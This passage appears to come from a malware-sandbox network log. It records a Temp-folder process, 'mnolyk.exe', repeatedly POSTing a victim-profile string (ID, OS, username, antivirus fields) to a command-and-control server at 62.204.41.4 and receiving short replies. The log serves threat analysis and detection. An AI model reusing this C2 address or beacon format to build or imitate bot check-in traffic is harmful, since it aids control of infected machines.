                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      395 | 192.168.2.7 | 50123 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:45.530649900 CET | 855 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.594862938 CET | 855 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      396 | 192.168.2.7 | 50124 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:45.767097950 CET | 856 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.832027912 CET | 856 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      397 | 192.168.2.7 | 50125 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:46.016413927 CET | 857 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.083712101 CET | 857 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      398 | 192.168.2.7 | 50126 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:46.263726950 CET | 858 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.327986002 CET | 858 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      399 | 192.168.2.7 | 50127 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:46.506414890 CET | 859 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.570149899 CET | 859 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.7 | 49728 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:57.036982059 CET | 436 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:57.103548050 CET | 436 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      40 | 192.168.2.7 | 49764 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:07.304244995 CET | 472 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.370210886 CET | 472 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      400 | 192.168.2.7 | 50128 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:46.748437881 CET | 860 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:46.816963911 CET | 860 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      401 | 192.168.2.7 | 50129 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:46.992346048 CET | 861 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.057813883 CET | 861 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      402 | 192.168.2.7 | 50130 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:47.251535892 CET | 862 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.316962004 CET | 862 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      403 | 192.168.2.7 | 50131 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:47.485008001 CET | 863 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.549081087 CET | 863 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      404 | 192.168.2.7 | 50132 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:47.847647905 CET | 864 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.911786079 CET  864  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      405  192.168.2.7  50133  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:48.134150982 CET  865  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:48.200330019 CET  865  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      406  192.168.2.7  50134  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:48.466411114 CET  866  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:48.530484915 CET  866  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      407  192.168.2.7  50135  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:49.197725058 CET  867  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:49.261332989 CET  867  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      408  192.168.2.7  50136  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:49.465984106 CET  868  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:49.531065941 CET  868  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      409  192.168.2.7  50137  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:50.172257900 CET  869  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.237481117 CET  869  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      41  192.168.2.7  49765  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:07.550648928 CET  472  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.616096973 CET  473  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      410  192.168.2.7  50138  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:50.675317049 CET  870  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.741820097 CET  870  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      411  192.168.2.7  50139  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:50.922595024 CET  871  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.985634089 CET  871  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      412  192.168.2.7  50140  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:51.157274961 CET  872  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.222137928 CET  872  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      413  192.168.2.7  50141  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:37:51.394661903 CET  873  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
